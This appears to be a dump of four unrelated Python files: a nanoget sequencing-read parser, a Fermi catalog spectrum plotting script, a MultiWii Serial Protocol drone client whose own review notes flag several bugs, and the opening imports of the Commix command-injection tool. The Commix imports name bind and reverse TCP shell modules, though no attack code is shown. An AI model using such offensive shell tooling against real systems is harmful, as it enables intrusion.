    match = reduce(lambda x, y: x + y[1] if y[0] in (0, 7, 8) else x, read.cigartuples, 0)
    ins = reduce(lambda x, y: x + y[1] if y[0] == 1 else x, read.cigartuples, 0)
    delt = reduce(lambda x, y: x + y[1] if y[0] == 2 else x, read.cigartuples, 0)
    alignment_length = match + ins + delt
    # Fix: guard up front. Previously a ZeroDivisionError raised inside the
    # MD-tag fallback (which runs in the `except KeyError` handler) escaped,
    # because a sibling `except ZeroDivisionError` does not catch exceptions
    # raised in another handler of the same try.
    if alignment_length == 0:
        return None
    try:
        return (1 - read.get_tag("NM") / alignment_length) * 100
    except KeyError:
        pass
    try:
        # NM tag absent: derive edit distance from MD (mismatches/deletions)
        # plus CIGAR insertions.
        return 100 * (1 - (parse_MD(read.get_tag("MD")) + parse_CIGAR(read.cigartuples)) /
                      alignment_length)
    except KeyError:
        return None
def parse_MD(MDlist):
    """Parse MD string to get number of mismatches and deletions.

    Every character that is neither a digit nor '^' is a mismatching or
    deleted reference base, so the count is the length of the MD string
    with digits and '^' stripped out.
    """
    return len(re.sub('[0-9^]', '', MDlist))
def parse_CIGAR(cigartuples):
    """Count the inserted bases in the read using the CIGAR tuples.

    Sums the lengths of all insertion operations (op code 1).
    """
    inserted = 0
    for operation, length in cigartuples:
        if operation == 1:
            inserted += length
    return inserted
def handle_compressed_input(inputfq, file_type="fastq"):
    """Return handles from compressed files according to extension.

    Check for which fastq input is presented and open a handle accordingly
    Can read from compressed files (gz, bz2, bgz) or uncompressed
    Relies on file extensions to recognize compression

    Returns an open text-mode handle; exits the process on an
    unrecognized extension.
    """
    ut.check_existance(inputfq)
    # NOTE(review): 'bgz' and 'fasta' are matched WITHOUT a leading dot, so
    # names like "reads_bgz" or "myfasta" also match -- confirm intended.
    if inputfq.endswith(('.gz', 'bgz')):
        import gzip
        logging.info("Nanoget: Decompressing gzipped {} {}".format(file_type, inputfq))
        return gzip.open(inputfq, 'rt')
    elif inputfq.endswith('.bz2'):
        import bz2
        logging.info("Nanoget: Decompressing bz2 compressed {} {}".format(file_type, inputfq))
        return bz2.open(inputfq, 'rt')
    elif inputfq.endswith(('.fastq', '.fq', 'fasta', '.fa', '.fas')):
        return open(inputfq, 'r')
    else:
        logging.error("INPUT ERROR: Unrecognized file extension {}".format(inputfq))
        sys.exit('INPUT ERROR:\nUnrecognized file extension in {}\n'
                 'Supported are gz, bz2, bgz, fastq, fq, fasta, fa and fas'.format(inputfq))
def process_fasta(fasta, **kwargs):
    """Combine metrics extracted from a fasta file.

    Only read lengths are available; returns a memory-reduced DataFrame
    with a single "lengths" column.
    """
    logging.info("Nanoget: Starting to collect statistics from a fasta file.")
    inputfasta = handle_compressed_input(fasta, file_type="fasta")
    return ut.reduce_memory_usage(pd.DataFrame(
        data=[len(rec) for rec in SeqIO.parse(inputfasta, "fasta")],
        columns=["lengths"]
    ).dropna())
def process_fastq_plain(fastq, **kwargs):
    """Combine metrics extracted from a fastq file.

    Returns a memory-reduced DataFrame with "quals" and "lengths" columns;
    records for which extraction yielded a falsy result are skipped.
    """
    logging.info("Nanoget: Starting to collect statistics from plain fastq file.")
    inputfastq = handle_compressed_input(fastq)
    return ut.reduce_memory_usage(pd.DataFrame(
        data=[res for res in extract_from_fastq(inputfastq) if res],
        columns=["quals", "lengths"]
    ).dropna())
def extract_from_fastq(fq):
    """Extract metrics from a fastq file.

    Yields (average quality, read length) per record.
    """
    for rec in SeqIO.parse(fq, "fastq"):
        yield ut.ave_qual(rec.letter_annotations["phred_quality"]), len(rec)
def stream_fastq_full(fastq, threads):
    """Generator for returning metrics extracted from fastq.

    Extract from a fastq file:
    -readname
    -read length
    -average quality
    (plus a trailing None placeholder -- see extract_all_from_fastq; a
    median quality is not currently computed.)
    """
    logging.info("Nanoget: Starting to collect full metrics from plain fastq file.")
    inputfastq = handle_compressed_input(fastq)
    with cfutures.ProcessPoolExecutor(max_workers=threads) as executor:
        for results in executor.map(extract_all_from_fastq, SeqIO.parse(inputfastq, "fastq")):
            yield results
    logging.info("Nanoget: Finished collecting statistics from plain fastq file.")
def extract_all_from_fastq(rec):
    """Extract metrics from a single fastq record (Bio.SeqRecord).

    Returns (identifier, read length, average quality, None); the trailing
    None fills the median-quality slot, which is not computed here.
    """
    return (rec.id,
            len(rec),
            ut.ave_qual(rec.letter_annotations["phred_quality"]),
            None)
def info_to_dict(info):
    """Get the key-value pairs from the albacore/minknow fastq description and return dict.

    The first whitespace-separated token (the read id) is skipped; every
    later token is split on '=' into a key and value.
    """
    pairs = {}
    for token in info.split(' ')[1:]:
        parts = token.split('=')
        pairs[parts[0]] = parts[1]
    return pairs
def process_fastq_rich(fastq, **kwargs):
    """Extract metrics from a richer fastq file.

    Extract information from fastq files generated by albacore or MinKNOW,
    containing richer information in the header (key-value pairs)
    read=<int> [72]
    ch=<int> [159]
    start_time=<timestamp> [2016-07-15T14:23:22Z]  # UTC ISO 8601 ISO 3339 timestamp
    Z indicates UTC time, T is the delimiter between date expression and time expression
    dateutil.parser.parse("2016-07-15T14:23:22Z") imported as dparse
    -> datetime.datetime(2016, 7, 15, 14, 23, 22, tzinfo=tzutc())

    Exits the process if a record lacks the 'ch', 'start_time' or 'runid'
    header fields.
    """
    logging.info("Nanoget: Starting to collect statistics from rich fastq file.")
    inputfastq = handle_compressed_input(fastq)
    res = []
    for record in SeqIO.parse(inputfastq, "fastq"):
        try:
            read_info = info_to_dict(record.description)
            res.append(
                (ut.ave_qual(record.letter_annotations["phred_quality"]),
                 len(record),
                 read_info["ch"],
                 read_info["start_time"],
                 read_info["runid"]))
        except KeyError:
            logging.error("Nanoget: keyerror when processing record {}".format(record.description))
            sys.exit("Unexpected fastq identifier:\n{}\n\n \
            missing one or more of expected fields 'ch', 'start_time' or 'runid'".format(
                record.description))
    df = pd.DataFrame(
        data=res,
        columns=["quals", "lengths", "channelIDs", "timestamp", "runIDs"]).dropna()
    # Channel ids arrive as strings from the header; store them as integers.
    df["channelIDs"] = df["channelIDs"].astype("int64")
    return ut.reduce_memory_usage(df)
def readfq(fp):
    """Generator function adapted from https://github.com/lh3/readfq.

    Parses mixed fasta/fastq from a line iterator and yields
    (name, sequence, qualities-or-None) tuples; qualities is None for
    fasta records and for a truncated final fastq record.
    """
    last = None  # this is a buffer keeping the last unprocessed line
    while True:  # mimic closure; is it a bad idea?
        if not last:  # the first record or a record following a fastq
            for l in fp:  # search for the start of the next record
                if l[0] in '>@':  # fasta/q header line
                    last = l[:-1]  # save this line
                    break
        if not last:
            break
        # Name is the header up to the first space; reset the buffer.
        name, seqs, last = last[1:].partition(" ")[0], [], None
        for l in fp:  # read the sequence
            if l[0] in '@+>':
                last = l[:-1]
                break
            seqs.append(l[:-1])
        if not last or last[0] != '+':  # this is a fasta record
            yield name, ''.join(seqs), None  # yield a fasta record
            if not last:
                break
        else:  # this is a fastq record
            seq, leng, seqs = ''.join(seqs), 0, []
            for l in fp:  # read the quality
                seqs.append(l[:-1])
                leng += len(l) - 1
                if leng >= len(seq):  # have read enough quality
                    last = None
                    yield name, seq, ''.join(seqs)  # yield a fastq record
                    break
            if last:  # reach EOF before reading enough quality
                yield name, seq, None  # yield a fasta record instead
                break
def fq_minimal(fq):
    """Minimal fastq metrics extractor.

    Quickly parse a fasta/fastq file - but makes expectations on the file format
    There will be dragons if unexpected format is used
    Expects a fastq_rich format, but extracts only timestamp and length

    Yields (timestamp, length) per 4-line record, then a final None at EOF.
    """
    try:
        while True:
            # Header line: the 5th space-separated token is assumed to be
            # "start_time=<ISO timestamp>Z"; [11:-1] strips the key prefix
            # and the trailing "Z" -- TODO confirm against basecaller output.
            time = next(fq)[1:].split(" ")[4][11:-1]
            # Length of the raw sequence line, including its newline.
            length = len(next(fq))
            next(fq)  # '+' separator line
            next(fq)  # quality line
            yield time, length
    except StopIteration:
        yield None
def process_fastq_minimal(fastq, **kwargs):
    """Swiftly extract minimal features (length and timestamp) from a rich fastq file"""
    infastq = handle_compressed_input(fastq)
    try:
        # fq_minimal yields a trailing None at EOF; the `if rec` filter drops it.
        df = pd.DataFrame(
            data=[rec for rec in fq_minimal(infastq) if rec],
            columns=["timestamp", "lengths"]
        )
    except IndexError:
        # Raised from fq_minimal's header slicing when the file does not
        # follow the expected rich-fastq layout.
        logging.error("Fatal: Incorrect file structure for fastq_minimal")
        sys.exit("Error: file does not match expected structure for fastq_minimal")
    return ut.reduce_memory_usage(df)
|
import numpy
from Plot.PlotLibrary import *
from Catalog.ReadFermiCatalog import *
from environ import FERMI_CATALOG_DIR
source = "2FGL J1015.1+4925"
Cat = FermiCatalogReader(source,FERMI_CATALOG_DIR,"e2dnde","TeV")
print "2FGL association ",Cat.Association('3FGL')
print "3FGL Name ",Cat.Association('2FHL','3FGL_name')
print "3FGL Var Index ",Cat.GetVarIndex("3FGL")
Cat.MakeSpectrum("3FGL",1e-4,0.3)
enerbut,but,enerphi,phi = Cat.Plot("3FGL")
Cat.MakeSpectrum("2FGL",1e-4,0.3)
enerbut2FGL,but2FGL,enerphi2FGL,phi2FGL = Cat.Plot("2FGL")
Cat.MakeSpectrum("2FHL",5e-2,2)
enerbut2FHL,but2FHL,enerphi2FHL,phi2FHL = Cat.Plot("2FHL")
em,ep,flux,dflux = Cat.GetDataPoints('3FGL') #energy in TeV since the user ask for that in the call of Cat
ener = numpy.sqrt(em*ep)
dem = ener-em
dep = ep-ener
c=Cat.ReadPL('3FGL')[3]
dnde = (-c+1)*flux*numpy.power(ener*1e6,-c+2)/(numpy.power((ep*1e6),-c+1)-numpy.power((em*1e6),-c+1))*1.6e-6
ddnde = dnde*dflux/flux
import matplotlib.pyplot as plt
plt.loglog()
plt.plot(enerbut, but, 'b-',label = "3FGL")
plt.plot(enerphi,phi, 'b-')
plt.plot(enerbut2FGL,but2FGL,'g-',label = "2FGL")
plt.plot(enerphi2FGL,phi2FGL,'g-')
plt.plot(enerbut2FHL,but2FHL,'r-',label = "2FHL")
plt.plot(enerphi2FHL,phi2FHL,'r-')
plt.errorbar(ener, dnde, xerr= [dem,dep], yerr = ddnde,fmt='o')
plt.legend(loc = 3)
plt.ylabel('E2dN/dE(erg.cm-2.s-1)')
plt.xlabel('energy (TeV)')
plt.show()
|
"""
author: Alex Apostoli
based on https://github.com/hkm95/python-multiwii
which is under GPLv3
"""
import struct
import time
import sys
import re
class MSPItem:
    """Descriptor for one MSP message: struct format(s) plus field names.

    ``fmt``/``fields`` may be single strings or parallel lists; each format
    chunk is decoded in sequence from the owning PyMSP's input buffer.
    """
    def __init__(self, name, fmt, fields):
        self.name = name
        self.format = fmt
        self.fields = fields
        # Normalise the scalar form to the list form so parse() has one path.
        if not isinstance(self.format, list):
            self.format = [self.format]
            self.fields = [self.fields]
        self.values = {}  # field name -> decoded value (or list when repeated)
    def parse(self, msp, dataSize):
        '''parse data

        Decodes this message from msp.inBuf starting at msp.p and records
        the result in msp.by_name.  Raises if fewer than fmt_size bytes remain.
        '''
        ofs = msp.p
        for i in range(len(self.format)):
            fmt = self.format[i]
            fields = self.fields[i].split(',')
            if fmt[0] == '{':
                # we have a repeat count from an earlier variable, e.g. "{osd_item_count}H"
                right = fmt.find('}')
                vname = fmt[1:right]
                count = self.values[vname]
                fmt = "%u%s" % (count, fmt[right+1:])
            if fmt[0].isdigit():
                # leading digits mean "repeat": the fields become lists
                repeat = int(re.search(r'\d+', fmt).group())
            else:
                repeat = None
            fmt = "<" + fmt  # MSP is little-endian
            fmt_size = struct.calcsize(fmt)
            if dataSize < fmt_size:
                raise Exception("Format %s needs %u bytes got %u for %s" % (self.name, fmt_size, dataSize, fmt))
            values = list(struct.unpack(fmt, msp.inBuf[ofs:ofs+fmt_size]))
            if repeat is not None:
                # NOTE(review): values[j*len(fields)] ignores the field offset i;
                # for multi-field repeats this reads the same column for every
                # field — looks like it should be values[j*len(fields)+i]. TODO confirm.
                for i in range(len(fields)):
                    self.values[fields[i]] = []
                    for j in range(repeat):
                        self.values[fields[i]].append(values[j*len(fields)])
            else:
                for i in range(len(fields)):
                    self.values[fields[i]] = values[i]
            dataSize -= fmt_size
            ofs += fmt_size
        msp.by_name[self.name] = self
        #print("Got %s" % self.name)
class PyMSP:
    """ Multiwii Serial Protocol

    Frame parser/builder for MSP ("$M<" requests, "$M>" replies).  Incoming
    bytes are fed through parseMspData()/parseMspByte(); decoded messages are
    stored by name in self.by_name and read back with get("MSG.field").
    """

    # --- OSD element identifiers (Betaflight OSD layout slots) ---
    OSD_RSSI_VALUE = 0
    OSD_MAIN_BATT_VOLTAGE = 1
    OSD_CROSSHAIRS = 2
    OSD_ARTIFICIAL_HORIZON = 3
    OSD_HORIZON_SIDEBARS = 4
    OSD_ITEM_TIMER_1 = 5
    OSD_ITEM_TIMER_2 = 6
    OSD_FLYMODE = 7
    OSD_CRAFT_NAME = 8
    OSD_THROTTLE_POS = 9
    OSD_VTX_CHANNEL = 10
    OSD_CURRENT_DRAW = 11
    OSD_MAH_DRAWN = 12
    OSD_GPS_SPEED = 13
    OSD_GPS_SATS = 14
    OSD_ALTITUDE = 15
    OSD_ROLL_PIDS = 16
    OSD_PITCH_PIDS = 17
    OSD_YAW_PIDS = 18
    OSD_POWER = 19
    OSD_PIDRATE_PROFILE = 20
    OSD_WARNINGS = 21
    OSD_AVG_CELL_VOLTAGE = 22
    OSD_GPS_LON = 23
    OSD_GPS_LAT = 24
    OSD_DEBUG = 25
    OSD_PITCH_ANGLE = 26
    OSD_ROLL_ANGLE = 27
    OSD_MAIN_BATT_USAGE = 28
    OSD_DISARMED = 29
    OSD_HOME_DIR = 30
    OSD_HOME_DIST = 31
    OSD_NUMERICAL_HEADING = 32
    OSD_NUMERICAL_VARIO = 33
    OSD_COMPASS_BAR = 34
    OSD_ESC_TMP = 35
    OSD_ESC_RPM = 36
    OSD_REMAINING_TIME_ESTIMATE = 37
    OSD_RTC_DATETIME = 38
    OSD_ADJUSTMENT_RANGE = 39
    OSD_CORE_TEMPERATURE = 40
    OSD_ANTI_GRAVITY = 41
    OSD_G_FORCE = 42
    OSD_MOTOR_DIAG = 43
    OSD_LOG_STATUS = 44
    OSD_FLIP_ARROW = 45
    OSD_LINK_QUALITY = 46
    OSD_FLIGHT_DIST = 47
    OSD_STICK_OVERLAY_LEFT = 48
    OSD_STICK_OVERLAY_RIGHT = 49
    OSD_DISPLAY_NAME = 50
    OSD_ESC_RPM_FREQ = 51
    OSD_RATE_PROFILE_NAME = 52
    OSD_PID_PROFILE_NAME = 53
    OSD_PROFILE_NAME = 54
    OSD_RSSI_DBM_VALUE = 55
    OSD_RC_CHANNELS = 56
    OSD_CAMERA_FRAME = 57

    # --- MSP command ids ---
    MSP_NAME =10
    MSP_OSD_CONFIG =84
    MSP_IDENT =100
    MSP_STATUS =101
    MSP_RAW_IMU =102
    MSP_SERVO =103
    MSP_MOTOR =104
    MSP_RC =105
    MSP_RAW_GPS =106
    MSP_COMP_GPS =107
    MSP_ATTITUDE =108
    MSP_ALTITUDE =109
    MSP_ANALOG =110
    MSP_RC_TUNING =111
    MSP_PID =112
    MSP_BOX =113
    MSP_MISC =114
    MSP_MOTOR_PINS =115
    MSP_BOXNAMES =116
    MSP_PIDNAMES =117
    MSP_WP =118
    MSP_BOXIDS =119
    MSP_SERVO_CONF =120
    MSP_NAV_STATUS =121
    MSP_NAV_CONFIG =122
    MSP_MOTOR_3D_CONFIG =124
    MSP_RC_DEADBAND =125
    MSP_SENSOR_ALIGNMENT =126
    MSP_LED_STRIP_MODECOLOR =127
    MSP_VOLTAGE_METERS =128
    MSP_CURRENT_METERS =129
    MSP_BATTERY_STATE =130
    MSP_MOTOR_CONFIG =131
    MSP_GPS_CONFIG =132
    MSP_COMPASS_CONFIG =133
    MSP_ESC_SENSOR_DATA =134
    MSP_GPS_RESCUE =135
    MSP_GPS_RESCUE_PIDS =136
    MSP_VTXTABLE_BAND =137
    MSP_VTXTABLE_POWERLEVEL =138
    MSP_MOTOR_TELEMETRY =139
    MSP_SET_RAW_RC =200
    MSP_SET_RAW_GPS =201
    MSP_SET_PID =202
    MSP_SET_BOX =203
    MSP_SET_RC_TUNING =204
    MSP_ACC_CALIBRATION =205
    MSP_MAG_CALIBRATION =206
    MSP_SET_MISC =207
    MSP_RESET_CONF =208
    MSP_SET_WP =209
    MSP_SELECT_SETTING =210
    MSP_SET_HEAD =211
    MSP_SET_SERVO_CONF =212
    MSP_SET_MOTOR =214
    MSP_SET_NAV_CONFIG =215
    MSP_SET_MOTOR_3D_CONFIG =217
    MSP_SET_RC_DEADBAND =218
    MSP_SET_RESET_CURR_PID =219
    MSP_SET_SENSOR_ALIGNMENT =220
    MSP_SET_LED_STRIP_MODECOLOR=221
    MSP_SET_MOTOR_CONFIG =222
    MSP_SET_GPS_CONFIG =223
    MSP_SET_COMPASS_CONFIG =224
    MSP_SET_GPS_RESCUE =225
    MSP_SET_GPS_RESCUE_PIDS =226
    MSP_SET_VTXTABLE_BAND =227
    MSP_SET_VTXTABLE_POWERLEVEL=228
    MSP_BIND =241
    MSP_RTC =247
    MSP_EEPROM_WRITE =250
    MSP_DEBUGMSG =253
    MSP_DEBUG =254

    # --- receive state machine states ---
    IDLE = 0
    HEADER_START = 1
    HEADER_M = 2
    HEADER_ARROW = 3
    HEADER_SIZE = 4
    HEADER_CMD = 5
    HEADER_ERR = 6

    PIDITEMS = 10

    # Messages decoded generically via MSPItem; anything not listed here is
    # handled (or ignored) in evaluateCommand().
    # NOTE: the original table listed MSP_STATUS twice; only the later,
    # 11-field entry ever took effect, so the dead duplicate was removed.
    MESSAGES = {
        MSP_RAW_GPS:  MSPItem('RAW_GPS', "BBiihH", "fix,numSat,Lat,Lon,Alt,Speed"),
        MSP_IDENT:    MSPItem('IDENT', "BBBI", "version,multiType,MSPVersion,multiCapability"),
        MSP_RAW_IMU:  MSPItem('RAW_IMU', "hhhhhhhhh", "AccX,AccY,AccZ,GyrX,GyrY,GyrZ,MagX,MagY,MagZ"),
        MSP_SERVO:    MSPItem('SERVO', "8h", "servo"),
        MSP_MOTOR:    MSPItem('MOTOR', "8h", "motor"),
        MSP_RC:       MSPItem('RC', "8h", "rc"),
        MSP_COMP_GPS: MSPItem('COMP_GPS', "HhB", "distanceToHome,directionToHome,update"),
        MSP_ATTITUDE: MSPItem('ATTITUDE', "hhh", "roll,pitch,yaw"),
        MSP_ALTITUDE: MSPItem('ALTITUDE', "ih", "alt,vspeed"),
        MSP_RC_TUNING: MSPItem('RC_TUNING', "BBBBBBB", "RC_Rate,RC_Expo,RollPitchRate,YawRate,DynThrPID,ThrottleMID,ThrottleExpo"),
        MSP_BATTERY_STATE: MSPItem('BATTERY_STATE', "BHBHh", "cellCount,capacity,voltage,mah,current"),
        MSP_RTC:      MSPItem('RTC', "HBBBBBH", "year,mon,mday,hour,min,sec,millis"),
        MSP_OSD_CONFIG: MSPItem("OSD_CONFIG",
                                ["BBBBHBBH",
                                 "{osd_item_count}H",
                                 "B", "{stats_item_count}H",
                                 "B", "{timer_count}H",
                                 "HBIBBB"],
                                ["feature,video_system,units,rssi_alarm,cap_alarm,unused1,osd_item_count,alt_alarm",
                                 "osd_items",
                                 "stats_item_count", "stats_items",
                                 "timer_count", "timer_items",
                                 "legacy_warnings,warnings_count,enabled_warnings,profiles,selected_profile,osd_overlay"]),
        # NOTE(review): "8PID" is not a valid struct format string ('P' is a
        # native-only pointer code, rejected with '<'); decoding MSP_PID would
        # raise in MSPItem.parse.  Left as-is pending the intended layout.
        MSP_PID:      MSPItem("PID", "8PID", "P,I,D"),
        MSP_MISC:     MSPItem("MISC", "HHHHHII","intPowerTrigger,conf1,conf2,conf3,conf4,conf5,conf6"),
        MSP_MOTOR_PINS: MSPItem("MOTOR_PINS", "8H","MP"),
        MSP_ANALOG:   MSPItem("ANALOG", "BHHHH", "dV,consumed_mah,rssi,current,volt"),
        MSP_STATUS:   MSPItem("STATUS", "HHHIBHHBBIB", "task_delta,i2c_err_count,sensor_status,mode_flags,nop_1,system_load,gyro_time,nop_2,nop_3,armed,extra"),
        }

    def __init__(self):
        self.msp_name = {
            'name':None
            }
        self.msp_osd_config = {}
        self.inBuf = bytearray([0] * 255)   # payload receive buffer
        self.p = 0                          # read cursor into inBuf
        self.c_state = self.IDLE            # receive state machine state
        self.err_rcvd = False               # last frame was a "$M!" error reply
        self.checksum = 0
        self.cmd = 0
        self.offset=0
        self.dataSize=0
        self.servo = []
        self.mot = []
        self.RCChan = []
        self.byteP = []
        self.byteI = []
        self.byteD = []
        self.confINF = []
        self.byteMP = []
        self.confP = []
        self.confI = []
        self.confD = []
        # parsed messages, indexed by name
        self.by_name = {}

    def get(self, fieldname):
        '''get a field from a parsed message by Message.Field name'''
        a = fieldname.split('.')
        msgName = a[0]
        fieldName = a[1]
        if not msgName in self.by_name:
            # default to zero for simplicty of display
            return 0
        msg = self.by_name[msgName]
        if not fieldName in msg.values:
            raise Exception("Unknown field %s" % fieldName)
        return msg.values[fieldName]

    def read32(self):
        '''signed 32 bit number'''
        value, = struct.unpack("<i", self.inBuf[self.p:self.p+4])
        self.p += 4
        return value
    def read32u(self):
        '''unsigned 32 bit number'''
        value, = struct.unpack("<I", self.inBuf[self.p:self.p+4])
        self.p += 4
        return value
    def read16(self):
        '''signed 16 bit number'''
        value, = struct.unpack("<h", self.inBuf[self.p:self.p+2])
        self.p += 2
        return value
    def read16u(self):
        '''unsigned 16 bit number'''
        value, = struct.unpack("<H", self.inBuf[self.p:self.p+2])
        self.p += 2
        return value
    def read8(self):
        '''unsigned 8 bit number'''
        value, = struct.unpack("<B", self.inBuf[self.p:self.p+1])
        self.p += 1
        return value

    def requestMSP (self, msp, payload = [], payloadinbytes = False):
        '''Build an outgoing MSP request frame as a list:
        ['$','M','<', size, cmd, *payload, checksum].

        payload is never mutated, so the mutable default is harmless here.
        '''
        if msp < 0:
            return 0
        checksum = 0
        bf = ['$', 'M', '<']
        # NOTE(review): size assumes 16-bit payload words; for byte payloads
        # (payloadinbytes=True) this header over-reports the length. TODO confirm.
        pl_size = 2 * ((len(payload)) & 0xFF)
        bf.append(pl_size)
        checksum ^= (pl_size&0xFF)
        bf.append(msp&0xFF)
        checksum ^= (msp&0xFF)
        # BUG FIX: was "if payload > 0", which compares a list with an int --
        # always True on Python 2 (even for an empty list) and a TypeError on
        # Python 3.  Test the length instead.
        if len(payload) > 0:
            if (payloadinbytes == False):
                packed = struct.pack('<%dh' % (pl_size // 2), *payload)
            else:
                # BUG FIX: the original '<%Bh' is not a valid %-format
                # ('%B' raises ValueError); pack the values as raw unsigned bytes.
                packed = struct.pack('<%dB' % len(payload), *payload)
            # BUG FIX: iterating struct.pack() output yields ints on Python 3,
            # where ord() would fail; handle both str (py2) and bytes (py3).
            for c in packed:
                checksum ^= (c if isinstance(c, int) else ord(c)) & 0xFF
            bf = bf + payload
        bf.append(checksum)
        return bf

    def evaluateCommand(self, cmd, dataSize):
        '''Dispatch one completed frame to its decoder.'''
        if cmd in self.MESSAGES:
            # most messages are parsed from the MESSAGES list
            self.MESSAGES[cmd].parse(self, dataSize)
        elif cmd == self.MSP_NAME:
            # craft name: NUL-terminated UTF-8 string
            s = bytearray()
            for i in range(0,dataSize,1):
                b = self.read8()
                if b == 0:
                    break
                s.append(b)
            self.msp_name['name'] = s.decode("utf-8")
        elif cmd == self.MSP_ACC_CALIBRATION:
            x = None  # ack only, no payload to decode
        elif cmd == self.MSP_MAG_CALIBRATION:
            x = None
        elif cmd == self.MSP_BOX:
            x = None
        elif cmd == self.MSP_BOXNAMES:
            x = None
        elif cmd == self.MSP_PIDNAMES:
            x = None
        elif cmd == self.MSP_SERVO_CONF:
            x = None
        elif cmd == self.MSP_DEBUGMSG:
            x = None
        elif cmd == self.MSP_DEBUG:
            x = None
        else:
            print("Unhandled command ", cmd, dataSize)

    def parseMspData(self, buf):
        '''Feed a buffer of received bytes through the state machine.'''
        for c in buf:
            self.parseMspByte(c)

    def parseMspByte(self, c):
        '''Advance the "$M>" frame state machine by one received byte.'''
        # Normalise to both a one-char string (cc) and an int (ci),
        # regardless of Python 2 (str) or Python 3 (int) byte semantics.
        if sys.version_info.major >= 3:
            cc = chr(c)
            ci = c
        else:
            cc = c
            ci = ord(c)
        if self.c_state == self.IDLE:
            if cc == '$':
                self.c_state = self.HEADER_START
            else:
                self.c_state = self.IDLE
        elif self.c_state == self.HEADER_START:
            if cc == 'M':
                self.c_state = self.HEADER_M
            else:
                self.c_state = self.IDLE
        elif self.c_state == self.HEADER_M:
            if cc == '>':
                self.c_state = self.HEADER_ARROW
            elif cc == '!':
                self.c_state = self.HEADER_ERR
            else:
                self.c_state = self.IDLE
        elif self.c_state == self.HEADER_ARROW or self.c_state == self.HEADER_ERR:
            # This byte is the payload size; '!' frames are error replies.
            self.err_rcvd = (self.c_state == self.HEADER_ERR)
            self.dataSize = ci
            # reset index variables
            self.p = 0
            self.offset = 0
            self.checksum = 0
            self.checksum ^= ci
            # the command is to follow
            self.c_state = self.HEADER_SIZE
        elif self.c_state == self.HEADER_SIZE:
            self.cmd = ci
            self.checksum ^= ci
            self.c_state = self.HEADER_CMD
        elif self.c_state == self.HEADER_CMD and self.offset < self.dataSize:
            # accumulate payload bytes
            self.checksum ^= ci
            self.inBuf[self.offset] = ci
            self.offset += 1
        elif self.c_state == self.HEADER_CMD and self.offset >= self.dataSize:
            # compare calculated and transferred checksum
            if ((self.checksum&0xFF) == ci):
                if self.err_rcvd:
                    print("Vehicle didn't understand the request type")
                else:
                    self.evaluateCommand(self.cmd, self.dataSize)
            else:
                print('"invalid checksum for command "+((int)(cmd&0xFF))+": "+(checksum&0xFF)+" expected, got "+(int)(c&0xFF))')
            self.c_state = self.IDLE

    def setPID(self):
        '''Scale self.confP/confI/confD into wire bytes and send MSP_SET_PID.

        NOTE(review): assumes confP/confI/confD and byteP/byteI/byteD already
        hold PIDITEMS entries; otherwise the index assignments raise. TODO confirm.
        '''
        self.sendRequestMSP(self.requestMSP(self.MSP_PID))
        self.receiveData(self.MSP_PID)
        time.sleep(0.04)
        payload = []
        for i in range(0, self.PIDITEMS, 1):
            self.byteP[i] = int((round(self.confP[i] * 10)))
            self.byteI[i] = int((round(self.confI[i] * 1000)))
            self.byteD[i] = int((round(self.confD[i])))

        # POS - 4 POSR - 5 NAVR - 6 use different scalings
        self.byteP[4] = int((round(self.confP[4] * 100.0)))
        self.byteI[4] = int((round(self.confI[4] * 100.0)))
        self.byteP[5] = int((round(self.confP[5] * 10.0)))
        self.byteI[5] = int((round(self.confI[5] * 100.0)))
        self.byteD[5] = int((round(self.confD[5] * 10000.0))) / 10
        self.byteP[6] = int((round(self.confP[6] * 10.0)))
        self.byteI[6] = int((round(self.confI[6] * 100.0)))
        self.byteD[6] = int((round(self.confD[6] * 10000.0))) / 10

        for i in range(0, self.PIDITEMS, 1):
            payload.append(self.byteP[i])
            payload.append(self.byteI[i])
            payload.append(self.byteD[i])
        self.sendRequestMSP(self.requestMSP(self.MSP_SET_PID, payload, True), True)

    def arm(self):
        '''Hold yaw-right/throttle-low RC values for ~0.5s to arm.'''
        timer = 0
        start = time.time()
        while timer < 0.5:
            data = [1500,1500,2000,1000]
            self.sendRequestMSP(self.requestMSP(self.MSP_SET_RAW_RC,data))
            time.sleep(0.05)
            timer = timer + (time.time() - start)
            start = time.time()

    def disarm(self):
        '''Hold yaw-left/throttle-low RC values for ~0.5s to disarm.'''
        timer = 0
        start = time.time()
        while timer < 0.5:
            data = [1500,1500,1000,1000]
            self.sendRequestMSP(self.requestMSP(self.MSP_SET_RAW_RC,data))
            time.sleep(0.05)
            timer = timer + (time.time() - start)
            start = time.time()

    def receiveIMU(self, duration):
        '''Poll MSP_RAW_IMU for `duration` seconds and print readings.

        NOTE(review): self.msp_raw_imu, sendRequestMSP and receiveData are not
        defined in this class -- presumably provided by a subclass or sibling
        code; verify before use.
        '''
        timer = 0
        start = time.time()
        while timer < duration:
            self.sendRequestMSP(self.requestMSP(self.MSP_RAW_IMU))
            self.receiveData(self.MSP_RAW_IMU)
            if self.msp_raw_imu['accx'] > 32768:  # 2^15 ...to check if negative number is received
                self.msp_raw_imu['accx'] -= 65536 # 2^16 ...converting into 2's complement
            if self.msp_raw_imu['accy'] > 32768:
                self.msp_raw_imu['accy'] -= 65536
            if self.msp_raw_imu['accz'] > 32768:
                self.msp_raw_imu['accz'] -= 65536
            if self.msp_raw_imu['gyrx'] > 32768:
                self.msp_raw_imu['gyrx'] -= 65536
            if self.msp_raw_imu['gyry'] > 32768:
                self.msp_raw_imu['gyry'] -= 65536
            if self.msp_raw_imu['gyrz'] > 32768:
                self.msp_raw_imu['gyrz'] -= 65536
            print("size: %d, accx: %f, accy: %f, accz: %f, gyrx: %f, gyry: %f, gyrz: %f " %(self.msp_raw_imu['size'], self.msp_raw_imu['accx'], self.msp_raw_imu['accy'], self.msp_raw_imu['accz'], self.msp_raw_imu['gyrx'], self.msp_raw_imu['gyry'], self.msp_raw_imu['gyrz']))
            time.sleep(0.04)
            timer = timer + (time.time() - start)
            start = time.time()

    def calibrateIMU(self):
        '''Request accelerometer calibration (ack-only command).'''
        self.sendRequestMSP(self.requestMSP(self.MSP_ACC_CALIBRATION))
        time.sleep(0.01)
|
"""
This file is part of Commix Project (http://commixproject.com).
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst).
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
import re
import os
import sys
import time
import urllib
import urlparse
from src.utils import menu
from src.utils import settings
from src.core.injections.controller import checks
from src.thirdparty.colorama import Fore, Back, Style, init
from src.core.shells import bind_tcp
from src.core.shells import reverse_tcp
